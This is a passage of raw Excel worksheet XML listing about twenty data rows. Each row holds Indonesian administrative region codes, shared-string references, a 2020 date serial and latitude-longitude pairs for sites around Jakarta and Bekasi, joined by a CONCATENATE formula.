      <c r="B1135" s="1">
        <v>43885</v>
      </c>
      <c r="C1135">
        <v>1</v>
      </c>
      <c r="D1135" t="s">
        <v>22</v>
      </c>
      <c r="E1135" t="s">
        <v>23</v>
      </c>
      <c r="F1135" t="s">
        <v>4219</v>
      </c>
      <c r="G1135" t="s">
        <v>4220</v>
      </c>
      <c r="H1135" t="s">
        <v>26</v>
      </c>
      <c r="I1135" t="s">
        <v>3695</v>
      </c>
      <c r="J1135" t="s">
        <v>3135</v>
      </c>
      <c r="L1135" t="s">
        <v>4221</v>
      </c>
      <c r="M1135">
        <v>3671010003</v>
      </c>
      <c r="N1135">
        <v>3671010</v>
      </c>
      <c r="O1135">
        <v>3671</v>
      </c>
      <c r="P1135">
        <v>36</v>
      </c>
      <c r="Q1135" t="s">
        <v>400</v>
      </c>
      <c r="R1135" t="s">
        <v>200</v>
      </c>
      <c r="S1135" t="s">
        <v>201</v>
      </c>
      <c r="T1135" t="s">
        <v>171</v>
      </c>
      <c r="U1135" s="5">
        <v>10670898</v>
      </c>
      <c r="V1135" s="5" t="s">
        <v>15508</v>
      </c>
      <c r="W1135" s="5">
        <v>-624867</v>
      </c>
      <c r="X1135" t="s">
        <v>19292</v>
      </c>
      <c r="Y1135" t="str">
        <f t="shared" si="17"/>
        <v>-6.24867,106.70898</v>
      </c>
    </row>
    <row r="1136" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1136">
        <v>108707</v>
      </c>
      <c r="B1136" s="1">
        <v>43885</v>
      </c>
      <c r="C1136">
        <v>1</v>
      </c>
      <c r="D1136" t="s">
        <v>22</v>
      </c>
      <c r="E1136" t="s">
        <v>23</v>
      </c>
      <c r="F1136" t="s">
        <v>4222</v>
      </c>
      <c r="G1136" t="s">
        <v>4223</v>
      </c>
      <c r="H1136" t="s">
        <v>26</v>
      </c>
      <c r="I1136" t="s">
        <v>2005</v>
      </c>
      <c r="J1136" t="s">
        <v>4224</v>
      </c>
      <c r="L1136" t="s">
        <v>4225</v>
      </c>
      <c r="M1136">
        <v>3173060003</v>
      </c>
      <c r="N1136">
        <v>3173060</v>
      </c>
      <c r="O1136">
        <v>3173</v>
      </c>
      <c r="P1136">
        <v>31</v>
      </c>
      <c r="Q1136" t="s">
        <v>3773</v>
      </c>
      <c r="R1136" t="s">
        <v>61</v>
      </c>
      <c r="S1136" t="s">
        <v>62</v>
      </c>
      <c r="T1136" t="s">
        <v>33</v>
      </c>
      <c r="U1136" s="5">
        <v>10686513</v>
      </c>
      <c r="V1136" s="5" t="s">
        <v>15509</v>
      </c>
      <c r="W1136" s="5">
        <v>-616181</v>
      </c>
      <c r="X1136" t="s">
        <v>19293</v>
      </c>
      <c r="Y1136" t="str">
        <f t="shared" si="17"/>
        <v>-6.16181,106.86513</v>
      </c>
    </row>
    <row r="1137" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1137">
        <v>108708</v>
      </c>
      <c r="B1137" s="1">
        <v>43885</v>
      </c>
      <c r="C1137">
        <v>1</v>
      </c>
      <c r="D1137" t="s">
        <v>22</v>
      </c>
      <c r="E1137" t="s">
        <v>23</v>
      </c>
      <c r="F1137" t="s">
        <v>4226</v>
      </c>
      <c r="G1137" t="s">
        <v>4227</v>
      </c>
      <c r="H1137" t="s">
        <v>26</v>
      </c>
      <c r="I1137" t="s">
        <v>4228</v>
      </c>
      <c r="J1137" t="s">
        <v>2627</v>
      </c>
      <c r="L1137" t="s">
        <v>4229</v>
      </c>
      <c r="M1137">
        <v>3275040005</v>
      </c>
      <c r="N1137">
        <v>3275040</v>
      </c>
      <c r="O1137">
        <v>3275</v>
      </c>
      <c r="P1137">
        <v>32</v>
      </c>
      <c r="Q1137" t="s">
        <v>2956</v>
      </c>
      <c r="R1137" t="s">
        <v>100</v>
      </c>
      <c r="S1137" t="s">
        <v>41</v>
      </c>
      <c r="T1137" t="s">
        <v>42</v>
      </c>
      <c r="U1137" s="5">
        <v>10701949</v>
      </c>
      <c r="V1137" s="5" t="s">
        <v>15510</v>
      </c>
      <c r="W1137" s="5">
        <v>-626296</v>
      </c>
      <c r="X1137" t="s">
        <v>19294</v>
      </c>
      <c r="Y1137" t="str">
        <f t="shared" si="17"/>
        <v>-6.26296,107.01949</v>
      </c>
    </row>
    <row r="1138" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1138">
        <v>108709</v>
      </c>
      <c r="B1138" s="1">
        <v>43885</v>
      </c>
      <c r="C1138">
        <v>1</v>
      </c>
      <c r="D1138" t="s">
        <v>22</v>
      </c>
      <c r="E1138" t="s">
        <v>23</v>
      </c>
      <c r="F1138" t="s">
        <v>4230</v>
      </c>
      <c r="G1138" t="s">
        <v>4231</v>
      </c>
      <c r="H1138" t="s">
        <v>26</v>
      </c>
      <c r="I1138" t="s">
        <v>354</v>
      </c>
      <c r="J1138" t="s">
        <v>2194</v>
      </c>
      <c r="L1138" t="s">
        <v>4232</v>
      </c>
      <c r="M1138">
        <v>3175050002</v>
      </c>
      <c r="N1138">
        <v>3175050</v>
      </c>
      <c r="O1138">
        <v>3175</v>
      </c>
      <c r="P1138">
        <v>31</v>
      </c>
      <c r="Q1138" t="s">
        <v>1012</v>
      </c>
      <c r="R1138" t="s">
        <v>1013</v>
      </c>
      <c r="S1138" t="s">
        <v>547</v>
      </c>
      <c r="T1138" t="s">
        <v>33</v>
      </c>
      <c r="U1138" s="5">
        <v>10690454</v>
      </c>
      <c r="V1138" s="5" t="s">
        <v>15511</v>
      </c>
      <c r="W1138" s="5">
        <v>-617279</v>
      </c>
      <c r="X1138" t="s">
        <v>19295</v>
      </c>
      <c r="Y1138" t="str">
        <f t="shared" si="17"/>
        <v>-6.17279,106.90454</v>
      </c>
    </row>
    <row r="1139" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1139">
        <v>108710</v>
      </c>
      <c r="B1139" s="1">
        <v>43885</v>
      </c>
      <c r="C1139">
        <v>1</v>
      </c>
      <c r="D1139" t="s">
        <v>22</v>
      </c>
      <c r="E1139" t="s">
        <v>23</v>
      </c>
      <c r="F1139" t="s">
        <v>4233</v>
      </c>
      <c r="H1139" t="s">
        <v>26</v>
      </c>
      <c r="I1139" t="s">
        <v>166</v>
      </c>
      <c r="J1139" t="s">
        <v>4234</v>
      </c>
      <c r="L1139" t="s">
        <v>4235</v>
      </c>
      <c r="M1139">
        <v>3173060001</v>
      </c>
      <c r="N1139">
        <v>3173060</v>
      </c>
      <c r="O1139">
        <v>3173</v>
      </c>
      <c r="P1139">
        <v>31</v>
      </c>
      <c r="Q1139" t="s">
        <v>494</v>
      </c>
      <c r="R1139" t="s">
        <v>61</v>
      </c>
      <c r="S1139" t="s">
        <v>62</v>
      </c>
      <c r="T1139" t="s">
        <v>33</v>
      </c>
      <c r="U1139" s="5">
        <v>10685580</v>
      </c>
      <c r="V1139" s="5" t="s">
        <v>15512</v>
      </c>
      <c r="W1139" s="5">
        <v>-616761</v>
      </c>
      <c r="X1139" t="s">
        <v>19296</v>
      </c>
      <c r="Y1139" t="str">
        <f t="shared" si="17"/>
        <v>-6.16761,106.85580</v>
      </c>
    </row>
    <row r="1140" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1140">
        <v>108711</v>
      </c>
      <c r="B1140" s="1">
        <v>43885</v>
      </c>
      <c r="C1140">
        <v>1</v>
      </c>
      <c r="D1140" t="s">
        <v>22</v>
      </c>
      <c r="E1140" t="s">
        <v>23</v>
      </c>
      <c r="F1140" t="s">
        <v>4236</v>
      </c>
      <c r="G1140" t="s">
        <v>4237</v>
      </c>
      <c r="H1140" t="s">
        <v>26</v>
      </c>
      <c r="I1140" t="s">
        <v>732</v>
      </c>
      <c r="J1140" t="s">
        <v>3066</v>
      </c>
      <c r="L1140" t="s">
        <v>4238</v>
      </c>
      <c r="M1140">
        <v>3173020001</v>
      </c>
      <c r="N1140">
        <v>3173020</v>
      </c>
      <c r="O1140">
        <v>3173</v>
      </c>
      <c r="P1140">
        <v>31</v>
      </c>
      <c r="Q1140" t="s">
        <v>179</v>
      </c>
      <c r="R1140" t="s">
        <v>179</v>
      </c>
      <c r="S1140" t="s">
        <v>62</v>
      </c>
      <c r="T1140" t="s">
        <v>33</v>
      </c>
      <c r="U1140" s="5">
        <v>10683380</v>
      </c>
      <c r="V1140" s="5" t="s">
        <v>15158</v>
      </c>
      <c r="W1140" s="5">
        <v>-619926</v>
      </c>
      <c r="X1140" t="s">
        <v>18957</v>
      </c>
      <c r="Y1140" t="str">
        <f t="shared" si="17"/>
        <v>-6.19926,106.83380</v>
      </c>
    </row>
    <row r="1141" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1141">
        <v>108712</v>
      </c>
      <c r="B1141" s="1">
        <v>43885</v>
      </c>
      <c r="C1141">
        <v>1</v>
      </c>
      <c r="D1141" t="s">
        <v>22</v>
      </c>
      <c r="E1141" t="s">
        <v>23</v>
      </c>
      <c r="F1141" t="s">
        <v>4239</v>
      </c>
      <c r="H1141" t="s">
        <v>26</v>
      </c>
      <c r="I1141" t="s">
        <v>3275</v>
      </c>
      <c r="J1141" t="s">
        <v>3229</v>
      </c>
      <c r="L1141" t="s">
        <v>250</v>
      </c>
      <c r="M1141">
        <v>3175050002</v>
      </c>
      <c r="N1141">
        <v>3175050</v>
      </c>
      <c r="O1141">
        <v>3175</v>
      </c>
      <c r="P1141">
        <v>31</v>
      </c>
      <c r="Q1141" t="s">
        <v>1012</v>
      </c>
      <c r="R1141" t="s">
        <v>1013</v>
      </c>
      <c r="S1141" t="s">
        <v>547</v>
      </c>
      <c r="T1141" t="s">
        <v>33</v>
      </c>
      <c r="U1141" s="5">
        <v>10690286</v>
      </c>
      <c r="V1141" s="5" t="s">
        <v>15513</v>
      </c>
      <c r="W1141" s="5">
        <v>-616862</v>
      </c>
      <c r="X1141" t="s">
        <v>19297</v>
      </c>
      <c r="Y1141" t="str">
        <f t="shared" si="17"/>
        <v>-6.16862,106.90286</v>
      </c>
    </row>
    <row r="1142" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1142">
        <v>108713</v>
      </c>
      <c r="B1142" s="1">
        <v>43885</v>
      </c>
      <c r="C1142">
        <v>1</v>
      </c>
      <c r="D1142" t="s">
        <v>22</v>
      </c>
      <c r="E1142" t="s">
        <v>23</v>
      </c>
      <c r="F1142" t="s">
        <v>4240</v>
      </c>
      <c r="H1142" t="s">
        <v>26</v>
      </c>
      <c r="I1142" t="s">
        <v>166</v>
      </c>
      <c r="J1142" t="s">
        <v>4241</v>
      </c>
      <c r="L1142" t="s">
        <v>4242</v>
      </c>
      <c r="M1142">
        <v>3172080006</v>
      </c>
      <c r="N1142">
        <v>3172080</v>
      </c>
      <c r="O1142">
        <v>3172</v>
      </c>
      <c r="P1142">
        <v>31</v>
      </c>
      <c r="Q1142" t="s">
        <v>2853</v>
      </c>
      <c r="R1142" t="s">
        <v>141</v>
      </c>
      <c r="S1142" t="s">
        <v>49</v>
      </c>
      <c r="T1142" t="s">
        <v>33</v>
      </c>
      <c r="U1142" s="5">
        <v>10693851</v>
      </c>
      <c r="V1142" s="5" t="s">
        <v>15514</v>
      </c>
      <c r="W1142" s="5">
        <v>-616999</v>
      </c>
      <c r="X1142" t="s">
        <v>18861</v>
      </c>
      <c r="Y1142" t="str">
        <f t="shared" si="17"/>
        <v>-6.16999,106.93851</v>
      </c>
    </row>
    <row r="1143" spans="1:25" hidden="1" x14ac:dyDescent="0.25">
      <c r="V1143" s="5" t="s">
        <v>15398</v>
      </c>
      <c r="X1143" t="s">
        <v>15398</v>
      </c>
      <c r="Y1143" t="str">
        <f t="shared" si="17"/>
        <v>Cek,Cek</v>
      </c>
    </row>
    <row r="1144" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1144">
        <v>108714</v>
      </c>
      <c r="B1144" s="1">
        <v>43885</v>
      </c>
      <c r="C1144">
        <v>1</v>
      </c>
      <c r="D1144" t="s">
        <v>22</v>
      </c>
      <c r="E1144" t="s">
        <v>23</v>
      </c>
      <c r="F1144" t="s">
        <v>4243</v>
      </c>
      <c r="G1144" t="s">
        <v>4244</v>
      </c>
      <c r="H1144" t="s">
        <v>26</v>
      </c>
      <c r="I1144" t="s">
        <v>1891</v>
      </c>
      <c r="J1144" t="s">
        <v>2627</v>
      </c>
      <c r="L1144" t="s">
        <v>4245</v>
      </c>
      <c r="M1144">
        <v>3275050003</v>
      </c>
      <c r="N1144">
        <v>3275050</v>
      </c>
      <c r="O1144">
        <v>3275</v>
      </c>
      <c r="P1144">
        <v>32</v>
      </c>
      <c r="Q1144" t="s">
        <v>2310</v>
      </c>
      <c r="R1144" t="s">
        <v>955</v>
      </c>
      <c r="S1144" t="s">
        <v>41</v>
      </c>
      <c r="T1144" t="s">
        <v>42</v>
      </c>
      <c r="U1144" s="5">
        <v>10698475</v>
      </c>
      <c r="V1144" s="5" t="s">
        <v>15515</v>
      </c>
      <c r="W1144" s="5">
        <v>-625688</v>
      </c>
      <c r="X1144" t="s">
        <v>19298</v>
      </c>
      <c r="Y1144" t="str">
        <f t="shared" si="17"/>
        <v>-6.25688,106.98475</v>
      </c>
    </row>
    <row r="1145" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1145">
        <v>108715</v>
      </c>
      <c r="B1145" s="1">
        <v>43885</v>
      </c>
      <c r="C1145">
        <v>1</v>
      </c>
      <c r="D1145" t="s">
        <v>22</v>
      </c>
      <c r="E1145" t="s">
        <v>23</v>
      </c>
      <c r="F1145" t="s">
        <v>4246</v>
      </c>
      <c r="H1145" t="s">
        <v>26</v>
      </c>
      <c r="I1145" t="s">
        <v>882</v>
      </c>
      <c r="J1145" t="s">
        <v>4247</v>
      </c>
      <c r="L1145" t="s">
        <v>250</v>
      </c>
      <c r="M1145">
        <v>3173060005</v>
      </c>
      <c r="N1145">
        <v>3173060</v>
      </c>
      <c r="O1145">
        <v>3173</v>
      </c>
      <c r="P1145">
        <v>31</v>
      </c>
      <c r="Q1145" t="s">
        <v>4248</v>
      </c>
      <c r="R1145" t="s">
        <v>61</v>
      </c>
      <c r="S1145" t="s">
        <v>62</v>
      </c>
      <c r="T1145" t="s">
        <v>33</v>
      </c>
      <c r="U1145" s="5">
        <v>10685138</v>
      </c>
      <c r="V1145" s="5" t="s">
        <v>15516</v>
      </c>
      <c r="W1145" s="5">
        <v>-616684</v>
      </c>
      <c r="X1145" t="s">
        <v>19299</v>
      </c>
      <c r="Y1145" t="str">
        <f t="shared" si="17"/>
        <v>-6.16684,106.85138</v>
      </c>
    </row>
    <row r="1146" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1146">
        <v>108716</v>
      </c>
      <c r="B1146" s="1">
        <v>43885</v>
      </c>
      <c r="C1146">
        <v>1</v>
      </c>
      <c r="D1146" t="s">
        <v>22</v>
      </c>
      <c r="E1146" t="s">
        <v>23</v>
      </c>
      <c r="F1146" t="s">
        <v>4249</v>
      </c>
      <c r="G1146" t="s">
        <v>4250</v>
      </c>
      <c r="H1146" t="s">
        <v>26</v>
      </c>
      <c r="I1146" t="s">
        <v>76</v>
      </c>
      <c r="J1146" t="s">
        <v>2627</v>
      </c>
      <c r="L1146" t="s">
        <v>4251</v>
      </c>
      <c r="M1146">
        <v>3275060008</v>
      </c>
      <c r="N1146">
        <v>3275060</v>
      </c>
      <c r="O1146">
        <v>3275</v>
      </c>
      <c r="P1146">
        <v>32</v>
      </c>
      <c r="Q1146" t="s">
        <v>2473</v>
      </c>
      <c r="R1146" t="s">
        <v>114</v>
      </c>
      <c r="S1146" t="s">
        <v>41</v>
      </c>
      <c r="T1146" t="s">
        <v>42</v>
      </c>
      <c r="U1146" s="5">
        <v>10696553</v>
      </c>
      <c r="V1146" s="5" t="s">
        <v>15517</v>
      </c>
      <c r="W1146" s="5">
        <v>-624000</v>
      </c>
      <c r="X1146" t="s">
        <v>19300</v>
      </c>
      <c r="Y1146" t="str">
        <f t="shared" si="17"/>
        <v>-6.24000,106.96553</v>
      </c>
    </row>
    <row r="1147" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1147">
        <v>108717</v>
      </c>
      <c r="B1147" s="1">
        <v>43885</v>
      </c>
      <c r="C1147">
        <v>1</v>
      </c>
      <c r="D1147" t="s">
        <v>22</v>
      </c>
      <c r="E1147" t="s">
        <v>23</v>
      </c>
      <c r="F1147" t="s">
        <v>4252</v>
      </c>
      <c r="H1147" t="s">
        <v>26</v>
      </c>
      <c r="I1147" t="s">
        <v>117</v>
      </c>
      <c r="J1147" t="s">
        <v>4247</v>
      </c>
      <c r="L1147" t="s">
        <v>4253</v>
      </c>
      <c r="M1147">
        <v>3173060005</v>
      </c>
      <c r="N1147">
        <v>3173060</v>
      </c>
      <c r="O1147">
        <v>3173</v>
      </c>
      <c r="P1147">
        <v>31</v>
      </c>
      <c r="Q1147" t="s">
        <v>4248</v>
      </c>
      <c r="R1147" t="s">
        <v>61</v>
      </c>
      <c r="S1147" t="s">
        <v>62</v>
      </c>
      <c r="T1147" t="s">
        <v>33</v>
      </c>
      <c r="U1147" s="5">
        <v>10685192</v>
      </c>
      <c r="V1147" s="5" t="s">
        <v>15518</v>
      </c>
      <c r="W1147" s="5">
        <v>-616551</v>
      </c>
      <c r="X1147" t="s">
        <v>19301</v>
      </c>
      <c r="Y1147" t="str">
        <f t="shared" si="17"/>
        <v>-6.16551,106.85192</v>
      </c>
    </row>
    <row r="1148" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1148">
        <v>108718</v>
      </c>
      <c r="B1148" s="1">
        <v>43885</v>
      </c>
      <c r="C1148">
        <v>1</v>
      </c>
      <c r="D1148" t="s">
        <v>22</v>
      </c>
      <c r="E1148" t="s">
        <v>23</v>
      </c>
      <c r="F1148" t="s">
        <v>4254</v>
      </c>
      <c r="H1148" t="s">
        <v>26</v>
      </c>
      <c r="I1148" t="s">
        <v>166</v>
      </c>
      <c r="J1148" t="s">
        <v>4255</v>
      </c>
      <c r="L1148" t="s">
        <v>4256</v>
      </c>
      <c r="M1148">
        <v>3173060002</v>
      </c>
      <c r="N1148">
        <v>3173060</v>
      </c>
      <c r="O1148">
        <v>3173</v>
      </c>
      <c r="P1148">
        <v>31</v>
      </c>
      <c r="Q1148" t="s">
        <v>60</v>
      </c>
      <c r="R1148" t="s">
        <v>61</v>
      </c>
      <c r="S1148" t="s">
        <v>62</v>
      </c>
      <c r="T1148" t="s">
        <v>33</v>
      </c>
      <c r="U1148" s="5">
        <v>10686434</v>
      </c>
      <c r="V1148" s="5" t="s">
        <v>15519</v>
      </c>
      <c r="W1148" s="5">
        <v>-616958</v>
      </c>
      <c r="X1148" t="s">
        <v>18944</v>
      </c>
      <c r="Y1148" t="str">
        <f t="shared" si="17"/>
        <v>-6.16958,106.86434</v>
      </c>
    </row>
    <row r="1149" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1149">
        <v>108719</v>
      </c>
      <c r="B1149" s="1">
        <v>43885</v>
      </c>
      <c r="C1149">
        <v>1</v>
      </c>
      <c r="D1149" t="s">
        <v>22</v>
      </c>
      <c r="E1149" t="s">
        <v>23</v>
      </c>
      <c r="F1149" t="s">
        <v>4257</v>
      </c>
      <c r="H1149" t="s">
        <v>26</v>
      </c>
      <c r="I1149" t="s">
        <v>383</v>
      </c>
      <c r="J1149" t="s">
        <v>4241</v>
      </c>
      <c r="L1149" t="s">
        <v>4258</v>
      </c>
      <c r="M1149">
        <v>3172080006</v>
      </c>
      <c r="N1149">
        <v>3172080</v>
      </c>
      <c r="O1149">
        <v>3172</v>
      </c>
      <c r="P1149">
        <v>31</v>
      </c>
      <c r="Q1149" t="s">
        <v>2853</v>
      </c>
      <c r="R1149" t="s">
        <v>141</v>
      </c>
      <c r="S1149" t="s">
        <v>49</v>
      </c>
      <c r="T1149" t="s">
        <v>33</v>
      </c>
      <c r="U1149" s="5">
        <v>10693841</v>
      </c>
      <c r="V1149" s="5" t="s">
        <v>15520</v>
      </c>
      <c r="W1149" s="5">
        <v>-616996</v>
      </c>
      <c r="X1149" t="s">
        <v>19302</v>
      </c>
      <c r="Y1149" t="str">
        <f t="shared" si="17"/>
        <v>-6.16996,106.93841</v>
      </c>
    </row>
    <row r="1150" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1150">
        <v>108720</v>
      </c>
      <c r="B1150" s="1">
        <v>43885</v>
      </c>
      <c r="C1150">
        <v>1</v>
      </c>
      <c r="D1150" t="s">
        <v>22</v>
      </c>
      <c r="E1150" t="s">
        <v>23</v>
      </c>
      <c r="F1150" t="s">
        <v>4259</v>
      </c>
      <c r="G1150" t="s">
        <v>4260</v>
      </c>
      <c r="H1150" t="s">
        <v>26</v>
      </c>
      <c r="I1150" t="s">
        <v>4261</v>
      </c>
      <c r="J1150" t="s">
        <v>2902</v>
      </c>
      <c r="L1150" t="s">
        <v>4262</v>
      </c>
      <c r="M1150">
        <v>3172020003</v>
      </c>
      <c r="N1150">
        <v>3172020</v>
      </c>
      <c r="O1150">
        <v>3172</v>
      </c>
      <c r="P1150">
        <v>31</v>
      </c>
      <c r="Q1150" t="s">
        <v>1644</v>
      </c>
      <c r="R1150" t="s">
        <v>1644</v>
      </c>
      <c r="S1150" t="s">
        <v>49</v>
      </c>
      <c r="T1150" t="s">
        <v>33</v>
      </c>
      <c r="U1150" s="5">
        <v>10688056</v>
      </c>
      <c r="V1150" s="5" t="s">
        <v>15521</v>
      </c>
      <c r="W1150" s="5">
        <v>-631944</v>
      </c>
      <c r="X1150" t="s">
        <v>19303</v>
      </c>
      <c r="Y1150" t="str">
        <f t="shared" si="17"/>
        <v>-6.31944,106.88056</v>
      </c>
    </row>
    <row r="1151" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1151">
        <v>108721</v>
      </c>
      <c r="B1151" s="1">
        <v>43885</v>
      </c>
      <c r="C1151">
        <v>1</v>
      </c>
      <c r="D1151" t="s">
        <v>22</v>
      </c>
      <c r="E1151" t="s">
        <v>23</v>
      </c>
      <c r="F1151" t="s">
        <v>4263</v>
      </c>
      <c r="G1151" t="s">
        <v>4264</v>
      </c>
      <c r="H1151" t="s">
        <v>26</v>
      </c>
      <c r="I1151" t="s">
        <v>166</v>
      </c>
      <c r="J1151" t="s">
        <v>4020</v>
      </c>
      <c r="L1151" t="s">
        <v>4265</v>
      </c>
      <c r="M1151">
        <v>3172050004</v>
      </c>
      <c r="N1151">
        <v>3172050</v>
      </c>
      <c r="O1151">
        <v>3172</v>
      </c>
      <c r="P1151">
        <v>31</v>
      </c>
      <c r="Q1151" t="s">
        <v>2717</v>
      </c>
      <c r="R1151" t="s">
        <v>358</v>
      </c>
      <c r="S1151" t="s">
        <v>49</v>
      </c>
      <c r="T1151" t="s">
        <v>33</v>
      </c>
      <c r="U1151" s="5">
        <v>10687468</v>
      </c>
      <c r="V1151" s="5" t="s">
        <v>15522</v>
      </c>
      <c r="W1151" s="5">
        <v>-629339</v>
      </c>
      <c r="X1151" t="s">
        <v>19304</v>
      </c>
      <c r="Y1151" t="str">
        <f t="shared" si="17"/>
        <v>-6.29339,106.87468</v>
      </c>
    </row>
    <row r="1152" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1152">
        <v>108722</v>
      </c>
      <c r="B1152" s="1">
        <v>43885</v>
      </c>
      <c r="C1152">
        <v>1</v>
      </c>
      <c r="D1152" t="s">
        <v>22</v>
      </c>
      <c r="E1152" t="s">
        <v>23</v>
      </c>
      <c r="F1152" t="s">
        <v>4266</v>
      </c>
      <c r="G1152" t="s">
        <v>4267</v>
      </c>
      <c r="H1152" t="s">
        <v>26</v>
      </c>
      <c r="I1152" t="s">
        <v>4268</v>
      </c>
      <c r="J1152" t="s">
        <v>4269</v>
      </c>
      <c r="L1152" t="s">
        <v>4270</v>
      </c>
      <c r="M1152">
        <v>3173060008</v>
      </c>
      <c r="N1152">
        <v>3173060</v>
      </c>
      <c r="O1152">
        <v>3173</v>
      </c>
      <c r="P1152">
        <v>31</v>
      </c>
      <c r="Q1152" t="s">
        <v>329</v>
      </c>
      <c r="R1152" t="s">
        <v>61</v>
      </c>
      <c r="S1152" t="s">
        <v>62</v>
      </c>
      <c r="T1152" t="s">
        <v>33</v>
      </c>
      <c r="U1152" s="5">
        <v>10684286</v>
      </c>
      <c r="V1152" s="5" t="s">
        <v>15523</v>
      </c>
      <c r="W1152" s="5">
        <v>-616036</v>
      </c>
      <c r="X1152" t="s">
        <v>19305</v>
      </c>
      <c r="Y1152" t="str">
        <f t="shared" si="17"/>
        <v>-6.16036,106.84286</v>
      </c>
    </row>
    <row r="1153" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1153">
        <v>108723</v>
      </c>
      <c r="B1153" s="1">
        <v>43885</v>
      </c>
      <c r="C1153">
        <v>1</v>
      </c>
      <c r="D1153" t="s">
        <v>22</v>
      </c>
      <c r="E1153" t="s">
        <v>23</v>
      </c>
      <c r="F1153" t="s">
        <v>4271</v>
      </c>
      <c r="G1153" t="s">
        <v>4272</v>
      </c>
      <c r="H1153" t="s">
        <v>26</v>
      </c>
      <c r="I1153" t="s">
        <v>1280</v>
      </c>
      <c r="J1153" t="s">
        <v>4273</v>
      </c>
      <c r="L1153" t="s">
        <v>4274</v>
      </c>
      <c r="M1153">
        <v>3172090006</v>
      </c>
      <c r="N1153">
        <v>3172090</v>
      </c>
      <c r="O1153">
        <v>3172</v>
      </c>
      <c r="P1153">
        <v>31</v>
      </c>
      <c r="Q1153" t="s">
        <v>2283</v>
      </c>
      <c r="R1153" t="s">
        <v>890</v>
      </c>
      <c r="S1153" t="s">
        <v>49</v>
      </c>
      <c r="T1153" t="s">
        <v>33</v>
      </c>
      <c r="U1153" s="5">
        <v>10689058</v>
      </c>
      <c r="V1153" s="5" t="s">
        <v>15524</v>
      </c>
      <c r="W1153" s="5">
        <v>-617521</v>
      </c>
      <c r="X1153" t="s">
        <v>19306</v>
      </c>
      <c r="Y1153" t="str">
        <f t="shared" si="17"/>
        <v>-6.17521,106.89058</v>
      </c>
    </row>
    <row r="1154" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1154">
        <v>108724</v>
      </c>
      <c r="B1154" s="1">
        <v>43885</v>
      </c>
      <c r="C1154">
        <v>1</v>
      </c>
      <c r="D1154" t="s">
        <v>22</v>
      </c>
      <c r="E1154" t="s">
        <v>23</v>
      </c>
      <c r="F1154" t="s">
        <v>4275</v>
      </c>
      <c r="H1154" t="s">
        <v>26</v>
      </c>
      <c r="I1154" t="s">
        <v>666</v>
      </c>
      <c r="J1154" t="s">
        <v>278</v>
      </c>
      <c r="L1154" t="s">
        <v>4276</v>
      </c>
      <c r="M1154">
        <v>3172040004</v>
      </c>
      <c r="N1154">
        <v>3172040</v>
      </c>
      <c r="O1154">
        <v>3172</v>
      </c>
      <c r="P1154">
        <v>31</v>
      </c>
      <c r="Q1154" t="s">
        <v>280</v>
      </c>
      <c r="R1154" t="s">
        <v>281</v>
      </c>
      <c r="S1154" t="s">
        <v>49</v>
      </c>
      <c r="T1154" t="s">
        <v>33</v>
      </c>
      <c r="U1154" s="5">
        <v>10687945</v>
      </c>
      <c r="V1154" s="5" t="s">
        <v>15525</v>
      </c>
      <c r="W1154" s="5">
        <v>-626909</v>
      </c>
      <c r="X1154" t="s">
        <v>19307</v>
      </c>
      <c r="Y1154" t="str">
        <f t="shared" si="17"/>
        <v>-6.26909,106.87945</v>
      </c>
    </row>
    <row r="1155" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1155">
        <v>108725</v>
      </c>
      <c r="B1155" s="1">
        <v>43885</v>
      </c>
      <c r="C1155">
        <v>1</v>
      </c>
      <c r="D1155" t="s">
        <v>22</v>
      </c>
      <c r="E1155" t="s">
        <v>23</v>
      </c>
      <c r="F1155" t="s">
        <v>4277</v>
      </c>
      <c r="G1155" t="s">
        <v>4278</v>
      </c>
      <c r="H1155" t="s">
        <v>26</v>
      </c>
      <c r="I1155" t="s">
        <v>1538</v>
      </c>
      <c r="J1155" t="s">
        <v>4234</v>
      </c>
      <c r="M1155">
        <v>3173060001</v>
      </c>
      <c r="N1155">
        <v>3173060</v>
      </c>
      <c r="O1155">
        <v>3173</v>
      </c>
      <c r="P1155">
        <v>31</v>
      </c>
      <c r="Q1155" t="s">
        <v>494</v>
      </c>
      <c r="R1155" t="s">
        <v>61</v>
      </c>
      <c r="S1155" t="s">
        <v>62</v>
      </c>
      <c r="T1155" t="s">
        <v>33</v>
      </c>
      <c r="U1155" s="5">
        <v>10685786</v>
      </c>
      <c r="V1155" s="5" t="s">
        <v>15526</v>
      </c>
      <c r="W1155" s="5">
        <v>-616783</v>
      </c>
      <c r="X1155" t="s">
        <v>19308</v>
      </c>
      <c r="Y1155" t="str">
        <f t="shared" ref="Y1155:Y1218" si="18">CONCATENATE(X1155,",",V1155)</f>
        <v>-6.16783,106.85786</v>
      </c>
    </row>
    <row r="1156" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1156">
        <v>108726</v>
      </c>
      <c r="B1156" s="1">
        <v>43885</v>
      </c>
      <c r="C1156">
        <v>1</v>
      </c>
      <c r="D1156" t="s">
        <v>22</v>
      </c>
      <c r="E1156" t="s">
        <v>23</v>
      </c>
      <c r="F1156" t="s">
        <v>4279</v>
      </c>
      <c r="G1156" t="s">
        <v>4280</v>
      </c>
      <c r="H1156" t="s">
        <v>26</v>
      </c>
      <c r="I1156" t="s">
        <v>3951</v>
      </c>
      <c r="J1156" t="s">
        <v>1590</v>
      </c>
      <c r="M1156">
        <v>3175030002</v>
      </c>
      <c r="N1156">
        <v>3175030</v>
      </c>
      <c r="O1156">
        <v>3175</v>
      </c>
      <c r="P1156">
        <v>31</v>
      </c>
      <c r="Q1156" t="s">
        <v>1592</v>
      </c>
      <c r="R1156" t="s">
        <v>1563</v>
